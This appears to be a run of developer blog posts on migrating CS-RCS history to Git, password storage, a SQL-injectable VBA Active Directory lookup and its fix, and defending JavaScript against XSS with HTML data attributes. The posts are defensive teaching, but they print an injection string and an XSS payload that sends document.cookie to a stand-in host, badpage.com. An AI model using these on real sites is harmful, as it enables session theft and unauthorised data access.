  • Carry all my history, so that I can review earlier versions of the code (for instance, when someone says they’ve got a new bug that never happened in the old version, or when I find a reversion, or when there’s a fix needed in one area of the code tree that I know I already made in a different area and just need to copy)
  • Lose all the history by starting fresh with the working copy of the source code

The second option seems a bit of a waste to me.

OK, so yes, technically I could mix the two modes, by using CS-RCS Pro to browse the ancient history when I need to, and Git to browse recent history, after starting Git from a clean working folder. But I could see a couple of problems:

  • Of course the bug I’m looking through history for is going to be across the two source control packages
  • It would mean I still have CS-RCS Pro sitting around installed, unpatched and likely vulnerable, on one of my dev systems

So, really, I wanted to make sure that I could move my files, history and all.

What stopped you?

I really didn’t have a good way to do it.

Clearly, any version control system can be moved to any other version control system by the simple expedient of:

  • For each change X:
    • Set the system date to X’s date
    • Fetch the old source control’s files from X into the workspace
    • Commit changes to the new source control, with any comments from X
    • Next change

But, as you can imagine, that’s really long-winded and manual. That should be automatable.

In fact, given the shared APIs of VSS-compatible source control services, I’m truly surprised that nobody has yet written a tool to do basically this task. I’d get on it myself, but I have other things to do. Maybe someone will write a “VSS2Git” or “VSS2VSS” toolkit to do just this.

There is a format for creating a single-file copy of a Git repository, which Git can process using the command “git fast-import”. So all I have to find is a tool that goes from a CS-RCS repository to the fast-import file format.

Nobody uses CS-RCS Pro

So, clearly there’s no tool to go from CS-RCS Pro to Git. There’s a tool to go from CS-RCS Pro to CVS, or there was, but that was on the now-defunct CS-RCS web site.

But… Remember I said that it’s compatible with GNU RCS.

And there’s scripts to go from GNU RCS to Git.

What you waiting for? Do it!

OK, so the script for this is written in Ruby, and as I read it, there seemed to be a few things that made it look like it might be for Linux only.

I really wasn’t interested in making a Linux VM (easy though that may be) just so I could convert my data.

So why are you writing this?

Everything changed with the arrival of the recent Windows 10 Anniversary Update, because along with it came a new component.

bashonubu

Bash on Ubuntu on Windows.

It’s like a Linux VM, without needing a VM, without having to install Linux, and it works really well.

With this, I could get all the tools I needed – GNU RCS, in case I needed it; Ruby; Git command line – and then I could try this out for myself.

Of course, I wouldn’t be publishing this if it wasn’t somewhat successful. But there are some caveats, OK?

Here’s the caveats

I’ve tried this a few times, on ONE of my own projects. This isn’t robustly tested, so if something goes all wrong, please by all means share, and people who are interested (maybe me) will probably offer suggestions, some of them useful. I’m not remotely warrantying this or suggesting it’s perfect. It may wipe your development history out of your one and only copy of version control… so don’t do it on your one and only copy. Make a backup first.

GNU RCS likes to store files in one of two places – either in the same directory as the working files, but with a “,v” pseudo-extension added to the filename, or in a sub-directory off each working folder, called “RCS” and with the same “,v” extension on the files. If you did either of these things, there’s no surprises. But…

CS-RCS Pro doesn’t do this. It has a separate RCS Repository Root. I put mine in C:\RCS, but you may have yours somewhere else. Underneath that RCS Repository Root is a full tree of the drives you’ve used CS-RCS to store (without the “:”), and a tree under that. I really hope you didn’t embed anything too deep, because that might bode ill.

Initially, this seemed like a bad thing, but because you don’t actually need the working files for this task, you can pretend that the RCS Repository is actually your working space.

Maybe this is obvious, but it took me a moment of thinking to decide I didn’t have to move files into RCS sub-folders of my working directories.

Make this a “flag day”. After you do this conversion, never use CS-RCS Pro again. It was good, and it did the job, and it’s now buried in the garden next to Old Yeller. Do not sprinkle the zombification water on that hallowed ground to revive it.

This also means you MUST check in all your code before converting, because checking it in afterwards will be … difficult.

Enough already, how do we do this?

Assumption: You have Windows 10.

  1. Install Windows 10 Anniversary Update – this is really easy, it’s an update, you’ve probably been offered it already, and you may even have installed it. This is how you’ll know you have it:
    capture20160826194922505
  2. Install Bash on Ubuntu on Windows – everyone else has written an article on how to do this, so here’s a link (I was going to link to the PC World article, but the full-page ad that popped up and obscured the screen, without letting me click the “no thanks” button persuaded me otherwise).
  3. Run the following commands in the bash shell:
    sudo apt-get update
    sudo apt-get install git
    sudo apt-get install ruby
  4. [Optional] Run “sudo apt-get instal rcs”, if you want to use the GNU RCS toolset to play with your original source control tree. Not sure I’d recommend doing too much of that.
  5. Change directory in the bash shell to a new, blank workspace folder you can afford to mess around in.
  6. Now a long bash command, but this really simply downloads the file containing rcs-fast-export:
    curl http://git.oblomov.eu/rcs-fast-export/blob_plain/c8a2bd6edbb21c1bfaf269ad1ec0e82af72c911a:/rcs-fast-export.rb -o rcs-fast-export.rb
  7. Make it executable with the command “chmod +x rcs-fast-export.rb”
  8. Git uses email addresses, rather than owner names, and it insists on them having angle brackets. If your username in CS-RCS Pro was “bob”, and your email address is “kate@example.com”, create an authors file with a bash command like this:
    echo “bob=Kate Smith <kate@example.com>” > AuthorsFile
  9. Now do the actual creation of the file to be imported, with this bash command:
    ./rcs-fast-export.rb -A AuthorsFile /mnt/c/RCS/…path-to-project… > project-name.gitexport
    [Note a couple of things here – starting with “./”, because that isn’t automatically in the PATH in Linux. Your Windows files are logically mounted in drives under /mnt, so C:\RCS is in /mnt/c/RCS. Case is important. Your “…path-to-project…” probably starts with “c/”, so that’s going to look like “/mnt/c/RCS/c/…” which might look awkward, but is correct. Use TAB-completion on folder names to help you.]
  10. Read the errors and correct any interesting ones.
  11. Now import the file into Git. We’re going to initialise a Git repository in the “.git” folder under the current folder, import the file, reset the head, and finally checkout all the files into the “master” branch under the current directory “.”. These are the bash commands to do this:
    git init
    git fast-import < project-name.gitexport
    git reset
    git checkout master .
  12. Profit!
  13. If you’re using Visual Studio and want to connect to this Git repository, remember that your Linux home directory sits under “%userprofile%\appdata\local\lxss\home”

This might look like a lot of instructions, but I mostly just wanted to be clear. This is really quick work. If you screw up after the “git init” command, simply “rm –rf .git” to remove the new repository.

How do you encrypt a password?

I hate when people ask me this question, because I inevitably respond with a half-dozen questions of my own, which makes me seem like a bit of an arse.

To reduce that feeling, because the questions don’t seem to be going away any time soon, I thought I’d write some thoughts out.

Put enough locks on a thing, it's secure. Or it collapses under the weight of the locks.

Do you want those passwords in the first place?

Passwords are important objects – and because people naturally share IDs and passwords across multiple services, your holding on to a customer’s / user’s password means you are a necessary part of that user’s web of credential storage.

It will be a monumental news story when your password database gets disclosed or leaked, and even more of a story if you’ve chosen a bad way of protecting that data. You will lose customers and you will lose business; you may even lose your whole business.

Take a long hard look at what you’re doing, and whether you actually need to be in charge of that kind of risk.

Do you need those passwords to verify a user or to impersonate them?

If you are going to verify a user, you don’t need encrypted passwords, you need hashed passwords. And those hashes must be salted. And the salt must be large and random. I’ll explain why some other time, but you should be able to find much documentation on this topic on the Internet. Specifically, you don’t need to be able to decrypt the password from storage, you need to be able to recognise it when you are given it again. Better still, use an acknowledged good password hashing mechanism like PBKDF2. (Note, from the “2” that it may be necessary to update this if my advice is more than a few months old)

Now, do not read the rest of this section – skip to the next question.

Seriously, what are you doing reading this bit? Go to the heading with the next question. You don’t need to read the next bit.

<sigh/>

OK, if you are determined that you will have to impersonate a user (or a service account), you might actually need to store the password in a decryptable form.

First make sure you absolutely need to do this, because there are many other ways to impersonate an incoming user using delegation, etc, which don’t require you storing the password.

Explore delegation first.

Finally, if you really have to store the password in an encrypted form, you have to do it incredibly securely. Make sure the key is stored separately from the encrypted passwords, and don’t let your encryption be brute-forcible. A BAD way to encrypt would be to simply encrypt the password using your public key – sure, this means only you can decrypt it, but it means anyone can brute-force an encryption and compare it against the ciphertext.

A GOOD way to encrypt the password is to add some entropy and padding to it (so I can’t tell how long the password was, and I can’t tell if two users have the same password), and then encrypt it.

Password storage mechanisms such as keychains or password vaults will do this for you.

If you don’t have keychains or password vaults, you can encrypt using a function like Windows’ CryptProtectData, or its .NET equivalent, System.Security.Cryptography.ProtectedData.

[Caveat: CryptProtectData and ProtectedData use DPAPI, which requires careful management if you want it to work across multiple hosts. Read the API and test before deploying.]

[Keychains and password vaults often have the same sort of issue with moving the encrypted password from one machine to another.]

For .NET documentation on password vaults in Windows 8 and beyond, see: Windows.Security.Credentials.PasswordVault

For non-.NET on Windows from XP and later, see: CredWrite

For Apple, see documentation on Keychains

Can you choose how strong those passwords must be?

If you’re protecting data in a business, you can probably tell users how strong their passwords must be. Look for measures that correlate strongly with entropy – how long is the password, does it use characters from a wide range (or is it just the letter ‘a’ repeated over and over?), is it similar to any of the most common passwords, does it contain information that is obvious, such as the user’s ID, or the name of this site?

Maybe you can reward customers for longer passwords – even something as simple as a “strong account award” sticker on their profile page can induce good behaviour.

Length is mathematically more important to password entropy than the range of characters. An eight character password chosen from 64 characters (less than three hundred trillion combinations – a number with 4 commas) is weaker than a 64 character password chosen from eight characters (a number of combinations with 19 commas in it).

An 8-character password taken from 64 possible characters is actually as strong as a password only twice as long and chosen from 8 characters – this means something like a complex password at 8 characters in length is as strong as the names of the notes in a couple of bars of your favourite tune.

Allowing users to use password safes of their own makes it easier for them to use longer and more complex passwords. This means allowing copy and paste into password fields, and where possible, integrating with any OS-standard password management schemes

What happens when a user forgets their password?

Everything seems to default to sending a password reset email. This means your users’ email address is equivalent to their credential. Is that strength of association truly warranted?

In the process to change my email address, you should ask me for my password first, or similarly strongly identify me.

What happens when I stop paying my ISP, and they give my email address to a new user? Will they have my account on your site now, too?

Every so often, maybe you should renew the relationship between account and email address – baselining – to ensure that the address still exists and still belongs to the right user.

Do you allow password hints or secret questions?

Password hints push you dangerously into the realm of actually storing passwords. Those password hints must be encrypted as well as if they were the password themselves. This is because people use hints such as “The password is ‘Oompaloompah’” – so, if storing password hints, you must encrypt them as strongly as if you were encrypting the password itself. Because, much of the time, you are. And see the previous rule, which says you want to avoid doing that if at all possible.

Other questions that I’m not answering today…

How do you enforce occasional password changes, and why?

What happens when a user changes their password?

What happens when your password database is leaked?

What happens when you need to change hash algorithm?

SQL injection in unexpected places

Every so often, I write about some real-world problems in this blog, rather than just getting excited about generalities. This is one of those times.

1. In which I am an idiot who thinks he is clever

I had a list of users the other day, exported from a partner with whom we do SSO, and which somehow had some duplicate entries in.

These were not duplicate in the sense of “exactly the same data in every field”, but differed by email address, and sometimes last name. Those of you who manage identity databases will know exactly what I’m dealing with here – people change their last name, through marriage, divorce, adoption, gender reassignment, whim or other reason, and instead of editing the existing entry, a new entry is somehow populated to the list of identities.

What hadn’t changed was that each of these individuals still held their old email address in Active Directory, so all I had to do was look up each email address, relate it to a particular user, and then pull out the canonical email address for that user. [In this case, that’s the first email address returned from AD]

A quick search on the interwebs gave me this as a suggested VBA function to do just that:

   1: Function GetEmail(email as String) as String

   2: ' Given one of this users' email addresses, find the canonical one.

   3:  

   4: ' Find our default domain base to search from

   5: Set objRootDSE = GetObject("LDAP://RootDSE")

   6: strBase = "'LDAP://" & objRootDSE.Get("defaultNamingContext") & "'"

   7:  

   8: ' Open a connection to AD

   9: Set ADOConnection = CreateObject("ADODB.Connection")

  10: ADOConnection.Provider = "ADsDSOObject"

  11: ADOConnection.Open "Active Directory Provider"

  12:  

  13: ' Create a command

  14: Set ADCommand = CreateObject("ADODB.Command")

  15: ADCommand.ActiveConnection = ADOConnection

  16:  

  17: 'Find user based on their email address

  18: ADCommand.CommandText = _

  19:     "SELECT distinguishedName,userPrincipalName,mail FROM " & _

  20:     strBase & " WHERE objectCategory='user' and mail='" & email & "'"

  21:  

  22: ' Execute this command

  23: Set ADRecordSet = ADCommand.Execute

  24:  

  25: ' Extract the canonical email address for this user.

  26: GetEmail = ADRecordSet.Fields("Mail")

  27:  

  28: ' Return.

  29: End Function

That did the trick, and I stopped thinking about it. Printed out the source just to demonstrate to a couple of people that this is not rocket surgery.

2. In which I realise I am idiot

Yesterday the printout caught my eye. Here’s the particular line that made me stop:

  18: ADCommand.CommandText = _

  19:     "SELECT distinguishedName,userPrincipalName,mail FROM " & _

  20:     strBase & " WHERE objectCategory='user' AND mail='" & email & "'"

That looks like a SQL query, doesn’t it?

Probably because it is.

It’s one of two formats that can be used to query Active Directory, the other being the less-readable LDAP syntax.

Both formats have the same problem – when you build the query using string concatenation like this, it’s possible for the input to give you an injection by escaping from the data and into the code.

I checked this out – when I called this function as follows, I got the first email address in the list as a response:

   1: Debug.Print GetEmail("x' OR mail='*")

You can see my previous SQL injection articles to come up with ideas of other things I can do now that I’ve got the ability to inject.

3. In which I try to be clever again

Normally, I’d suggest developers use Parameterised Queries to solve this problem – and that’s always the best idea, because it not only improves security, but it actually makes the query faster on subsequent runs, because it’s already optimised. Here’s how that ought to look:

   1: ADCommand.CommandText = _

   2:     "SELECT distinguishedName,userPrincipalName,mail FROM " & _

   3:     strBase & "WHERE objectCategory='user' AND mail=?"

   4:  

   5: 'Create and bind parameter

   6: Set ADParam = ADCommand.CreateParameter("", adVarChar, adParamInput, 40, email)

   7: ADCommand.Parameters.Append ADParam

That way, the question mark “?” gets replaced with “’youremail@example.com’” (including the single quote marks) and my injection attempt gets quoted in magical ways (usually, doubling single-quotes, but the parameter insertion is capable of knowing in what way it’s being inserted, and how exactly to quote the data).

4. In which I realise other people are idiot

uninterface

That’s the rather meaningful message:

Run-time error ‘-2147467262 (80004002)’:

No such interface supported

It doesn’t actually tell me which interface is supported, so of course I spend a half hour trying to figure out what changed that might have gone wrong – whether I’m using a question mark where perhaps I might need a named variable, possibly preceded by an “@” sign, but no, that’s SQL stored procedures, which are almost never the SQL injection solution they claim to be, largely because the same idiot who uses concatenation in his web service also does the same stupid trick in his SQL stored procedures, but I’m rambling now and getting far away from the point if I ever had one, so…

The interface that isn’t supported is the ability to set parameters.

The single best solution to SQL injection just plain isn’t provided in the ADODB library and/or the ADsDSOObject provider.

Why on earth would you miss that out, Microsoft?

5. I get clever

So, the smart answer here is input validation where possible, and if you absolutely have to accept any and all input, you must quote the strings that you’re passing in.

In my case, because I’m dealing with email addresses, I think I can reasonably restrict my input to alphanumerics, the “@” sign, full stops, hyphens and underscores.

Input validation depends greatly on the type of your input. If it’s a string, that will need to be provided in your SQL request surrounded with single quotes – that means that any single quote in the string will need to be encoded safely. Usually that means doubling the quote mark, although you might choose to replace them with double quotes or back ticks.

If your input is a number, you can be more restrictive in your input validation – only those characters that are actually parts of a number. That’s not necessarily as easy as it sounds – the letter “e” is often part of numbers, for instance, and you have to decide whether you’re going to accept bases other than 10. But from the perspective of securing against SQL injection, again that’s not too difficult to enforce.

Finally, of course, you have to decide what to do when bad input comes in – an error response, a static value, throw an exception, ignore the input and refuse to respond, etc. If you choose to signal an error back to the user, be careful not to provide information an attacker could find useful.

What’s useful to an attacker?

Sometimes the mere presence of an error is useful.

Certainly if you feed back to the attacker the full detail of the SQL query that went wrong – and people do sometimes do this! – you give the attacker far too much information.

Even feeding back the incorrect input can be a bad thing in many cases. In the Excel case I’m running into, that’s probably not easily exploitable, but you probably should be cautious anyway – if it’s an attacker causing an error, they may want you to echo back their input to exploit something else.

Call to Microsoft

Seriously, Microsoft, this is an unforgiveable lapse – not only is there no ability to provide the single best protection, because you didn’t implement the parameter interface, but also your own samples provide examples of code that is vulnerable to SQL injections. [Here and here – the other examples I was able to find use hard-coded search filters.]

Microsoft, update your samples to demonstrate how to securely query AD through the ADODB library, and consider whether it’s possible to extend the provider with the parameter interface so that we can use the gold-standard protection.

Call to developers

Parse your parameters – make sure they conform to expected values. Complain to the user when they don’t. Don’t use lack of samples as a reason not to deliver secure components.

Finally – how I did it right

And, because I know a few of you will hope to copy directly from my code, here’s how I wound up doing this exact function.

Please, by all means review it for mistakes – I don’t guarantee that this is correct, just that it’s better than I found originally. For instance, one thing it doesn’t check for is if the user actually has a value set for the “mail” field in Active Directory – I can tell you for certain, it’ll give a null reference error if you have one of these users come back from your search.

   1: Function GetEmail(email As String) As String

   2: ' Given one of this users' email addresses, find the canonical one.

   3:  

   4: ' Pre-execution input validation - email must contain only recognised characters.

   5: If email Like "*[!a-zA-Z0-9_@.]*" Then

   6: GetEmail = "Illegal characters"

   7: Exit Function

   8: End If

   9:  

  10:  

  11: ' Find our default domain base to search from

  12: Set objRootDSE = GetObject("LDAP://RootDSE")

  13: strBase = "'LDAP://" & objRootDSE.Get("defaultNamingContext") & "'"

  14:  

  15: ' Open a connection to AD

  16: Set ADOConnection = CreateObject("ADODB.Connection")

  17: ADOConnection.Provider = "ADsDSOObject"

  18: ADOConnection.Open "Active Directory Provider"

  19:  

  20: ' Create a command

  21: Set ADCommand = CreateObject("ADODB.Command")

  22: ADCommand.ActiveConnection = ADOConnection

  23:  

  24: 'Find user based on their email address

  25: ADCommand.CommandText = _

  26: "SELECT distinguishedName,userPrincipalName,mail FROM " & _

  27: strBase & " WHERE objectCategory='user' AND mail='" & email & "'"

  28:  

  29: ' Execute this command

  30: Set ADrecordset = ADCommand.Execute

  31:  

  32: ' Post execution validation - we should have exactly one answer.

  33: If ADrecordset Is Nothing Or (ADrecordset.EOF And ADrecordset.BOF) Then

  34: GetEmail = "Not found"

  35: Exit Function

  36: End If

  37: If ADrecordset.RecordCount > 1 Then

  38: GetEmail = "Many matches"

  39: Exit Function

  40: End If

  41:  

  42: ' Extract the canonical email address for this user.

  43: GetEmail = ADrecordset.Fields("Mail")

  44:  

  45: ' Return.

  46: End Function

As always, let me know if you find this at all useful.

Get on with git

Out with the old

Version control is one of those vital tools for developers that everyone has to use but very few people actually enjoy or understand.

So, it’s with no surprise that I noted a few months ago that the version control software on which I’ve relied for several years for my personal projects, Component Software’s CS-RCS, has not been built on in years, and cannot now be downloaded from its source site. [Hence no link from this blog]

Not so in with the new

I’ve used git before a few times in professional projects while I was working at Amazon, but relatively reluctantly – it has incredibly baroque and meaningless command-line options, and gives the impression that it was written by people who expected their users to be just as proficient with the ins and outs of version control as they are.

While I think it’s a great idea for developers to build software they would use themselves, I think it’s important to make sure that the software you build is also accessible by people who aren’t the same level of expertise as yourself. After all, if your users were as capable as the developer, they would already have built the solution for themselves, so your greater user-base comes from accommodating novices to experts with simple points of entry and levels of improved mastery.

git, along with many other open source, community-supported tools, doesn’t really accommodate the novice.

As such, it means that most people who use it rely on “cookbooks” of sets of instructions. “If you want to do X, type commands Y and Z” – without an emphasis on understanding why you’re doing this.

This leads inexorably to a feeling that you’re setting yourself up for a later fall, when you decide you want to do an advanced task, but discover that a decision you’ve made early on has prevented you from doing the advanced task in the way you want.

That’s why I’ve been reluctant to switch to git.

So why switch now?

But it’s clear that git is the way forward in the tools I’m most familiar with – Visual Studio and its surrounding set of developer applications.

It’s one of those decisions I’ve made some time ago, but not enacted until now, because I had no idea how to start – properly. Every git repository I’ve worked with so far has either been set up by someone else, or set up by me, based on a cookbook, for a new project, and in a git environment that’s managed by someone else. I don’t even know if those terms, repository and environment, are the right terms for the things I mean.

There are a number of advanced things I want to do from the very first – particularly, I want to bring my code from the old version control system, along with its history where possible, into the new system.

And I have a feeling that this requires I understand the decisions I make when setting this up.

So, it was with much excitement that I saw a link to this arrive in my email:

capture20151224111306522

Next thing is I’m going to watch this, and see how I’m supposed to work with git. I’ll let you know how it goes.

Auto convert inked shapes in PowerPoint–coming to OneNote

I happened upon a blog post by the Office team yesterday which surprised me, because it talked about a feature in PowerPoint that I’ve wanted ever since I first got my Surface 2.

Shape recognition

Here’s a link to documentation on how to use this feature in PowerPoint.

https://support.office.com/en-us/article/use-a-pen-to-draw-write-or-highlight-text-on-a-windows-tablet-6d76c674-7f4b-414d-b67f-b3ffef6ccf53

It seems like the obvious feature a tablet should have.

Here’s a video of me using it to draw a few random shapes:

But not just in PowerPoint – this should be in Word, in OneNote, in Paint, and pretty much any app that accepts ink.

And at last, OneNote

So here’s the blog post from Office noting that this feature will finally be available for OneNote in November.

https://blogs.office.com/2015/10/20/onenote-partners-with-fiftythree-to-support-pencil-and-paper-plus-shape-recognition-coming-soon/

On iPad, iPhone and Windows 10. Which I presume means it’ll only be on the Windows Store / Metro / Modern / Immersive version of OneNote.

That’s disappointing, because it should really be in every Office app. Hell, I’d update from Office 2013 tomorrow if this was a feature in Office 2016!

Let’s not stop there

Please, Microsoft, don’t stop at the Windows Store version of OneNote.

Shape recognition, along with handwriting recognition (which is apparently also hard), should be a natural part of my use of the Surface Pen. It should work the same across multiple apps.

That’s only going to happen if it’s present in multiple apps, and is a documented API which developers – of desktop apps as well as Store apps – can call into.

Well, desktop apps can definitely get that.

How can I put it into my own app?

I’ll admit that I haven’t had the time yet to build my own sample, but I’m hoping that this still works – there’s an API called “Ink Analysis”, which is exactly how you would achieve this in your app:

https://msdn.microsoft.com/en-us/library/ms704040.aspx

It allows you to analyse ink you’ve captured, and decide if it’s text or a drawing, and if it’s a drawing, what kind of drawing it might be.

[I’ve marked this with the tag “Alun’s Code” because I want to write a sample eventually that demonstrates this function.]

HTML data attributes – stop my XSS

First, a disclaimer for the TL;DR crowd – data attributes alone will not stop all XSS, mine or anyone else’s. You have to apply them correctly, and use them properly.

However, I think you’ll agree with me that it’s a great way to store and reference data in a page, and that if you only handle user data in correctly encoded data attributes, you have a greatly-reduced exposure to XSS, and can actually reduce your exposure to zero.

Next, a reminder about my theory of XSS – that there are four parts to an XSS attack – Injection, Escape, Attack and Cleanup. Injection is necessary and therefore can’t be blocked, Attacks are too varied to block, and Cleanup isn’t always required for an attack to succeed. Clearly, then, the Escape is the part of the XSS attack quartet that you can block.

Now let’s set up the code we’re trying to protect – say we want to have a user-input value accessible in JavaScript code. Maybe we’re passing a search query to Omniture (by far the majority of JavaScript Injection XSS issues I find). Here’s how it often looks:

<script>
s.prop1="mysite.com";
s.prop2="SEARCH-STRING";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
s_code=s.t();
if(s_code)
document.write(s_code)//—>
</script>

Let’s suppose that “SEARCH-STRING” above is the string for which I searched.

I can inject my code as a search for:

"-window.open("//badpage.com/"+document.cookie,"_top")-"

The second line then becomes:

s.prop2=""-window.open("//badpage.com/"+document.cookie,"_top")-"";

Yes, I know you can’t subtract two strings, but JavaScript doesn’t know that until it’s evaluated the window.open() function, and by then it’s too late, because it’s already executed the bad thing. A more sensible language would have thrown an error at compile time, but this is just another reason for security guys to hate dynamic languages.

How do data attributes fix this?

A data attribute is an attribute in an HTML tag, whose name begins with the word “data” and a hypen.

These data attributes can be on any HTML tag, but usually they sit in a tag which they describe, or which is at least very close to the portion of the page they describe.

Data attributes on table cells can be associated to the data within that cell, data attributes on a body tag can be associated to the whole page, or the context in which the page is loaded.

Because data attributes are HTML attributes, quoting their contents is easy. In fact, there’s really only a couple of quoting rules needed to consider.

  1. The attribute’s value must be quoted, either in double-quote or single-quote characters, but usually in double quotes because of XHTML
  2. Any ampersand (“&”) characters need to be HTML encoded to “&amp;”.
  3. Quote characters occurring in the value must be HTML encoded to “&quot;

Rules 2 & 3 can simply be replaced with “HTML encode everything in the value other than alphanumerics” before applying rule 1, and if that’s easier, do that.

Sidebar – why those rules?

HTML parses attribute value strings very simply – look for the first non-space character after the “=” sign, which is either a quote or not a quote. If it’s a quote, find another one of the same kind, HTML-decode what’s in between them, and that’s the attribute’s value. If the first non-space after the equal sign is not a quote, the value ends at the next space character.
Contemplate how these are parsed, and then see if you’re right:

  • <a onclick="prompt("1")">&lt;a onclick="prompt("1")"&gt;</a>

  • <a onclick = "prompt( 1 )">&lt;a onclick = "prompt( 1 )"&gt;</a>

  • <a onclick= prompt( 1 ) >&lt;a onclick= prompt( 1 ) &gt;</a>

  • <a onclick= prompt(" 1 ") >&lt;a onclick= prompt(" 1 ") &gt;</a>

  • <a onclick= prompt( "1" ) >&lt;a onclick= prompt( "1" ) &gt;</a>

  • <a onclick= "prompt( 1 )">&lt;a onclick=&amp;#9;"prompt( 1 )"&gt;</a>

  • <a onclick= "prompt( 1 )">&lt;a onclick=&amp;#32;"prompt( 1 )"&gt;</a>

  • <a onclick= thing=1;prompt(thing)>&lt;a onclick= thing=1;prompt(thing)&gt;</a>

  • <a onclick="prompt(\"1\")">&lt;a onclick="prompt(\"1\")"&gt;</a>

Try each of them (they aren’t live in this document – you should paste them into an HTML file and open it in your browser), see which ones prompt when you click on them. Play with some other formats of quoting. Did any of these surprise you as to how the browser parsed them?

Here’s how they look in the Debugger in Internet Explorer 11:

image

Uh… That’s not right, particularly line 8. Clearly syntax colouring in IE11’s Debugger window needs some work.

OK, let’s try the DOM Explorer:

image

Much better – note how the DOM explorer reorders some of these attributes, because it’s reading them out of the Document Object Model (DOM) in the browser as it is rendered, rather than as it exists in the source file. Now you can see which are interpreted as attribute names (in red) and which are the attribute values (in blue).

Other browsers have similar capabilities, of course – use whichever one works for you.

Hopefully this demonstrates why you need to follow the rules of 1) quoting with double quotes, 2) encoding any ampersand, and 3) encoding any double quotes.

Back to the data-attributes

So, now if I use those data-attributes, my HTML includes a number of tags, each with one or more attributes named “data-something-or-other”.

Accessing these tags from basic JavaScript is easy. You first need to get access to the DOM object representing the tag – if you’re operating inside of an event handler, you can simply use the “this” object to refer to the object on which the event is handled (so you may want to attach the data-* attributes to the object which triggers the handler).

If you’re not inside of an event handler, or you want to get access to another tag, you should find the object representing the tag in some other way – usually document.getElementById(…)

Once you have the object, you can query an attribute with the function getAttribute(…) – the single argument is the name of the attribute, and what’s returned is a string – and any HTML encoding in the data-attribute will have been decoded once.

Other frameworks have ways of accessing this data attribute more easily – for instance, JQuery has a “.data(…)” function which will fetch a data attribute’s value.

How this stops my XSS

I’ve noted before that stopping XSS is a “simple” matter of finding where you allow injection, and preventing, in a logical manner, every possible escape from the context into which you inject that data, so that it cannot possibly become code.

If all the data you inject into a page is injected as HTML attribute values or HTML text, you only need to know one function – HTML Encode – and whether you need to surround your value with quotes (in a data-attribute) or not (in HTML text). That’s a lot easier than trying to understand multiple injection contexts each with their own encoding function. It’s a lot easier to protect the inclusion of arbitrary user data in your web pages, and you’ll also gain the advantage of not having multiple injection points for the same piece of data. In short, your web page becomes more object-oriented, which isn’t a bad thing at all.

One final gotcha

You can still kick your own arse.

When converting user input from the string you get from getAttribute to a numeric value, what function are you going to use?

Please don’t say “eval”.

Eval is evil. Just like innerHtml and document.write, its use is an invitation to Cross-Site Scripting.

Use parseFloat() and parseInt(), because they won’t evaluate function calls or other nefarious components in your strings.

So, now I’m hoping your Omniture script looks like this:

<div id="myDataDiv" data-search-term="SEARCH-STRING"></div>
<script>
s.prop1="mysite.com";
s.prop2=document.getElementById("myDataDiv").getAttribute("data-search-term");
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
s_code=s.t();
if(s_code)
document.write(s_code)//—>
</script>

You didn’t forget to HTML encode your SEARCH-STRING, or at least its quotes and ampersands, did you?

P.S. Omniture doesn’t cause XSS, but many people implementing its required calls do.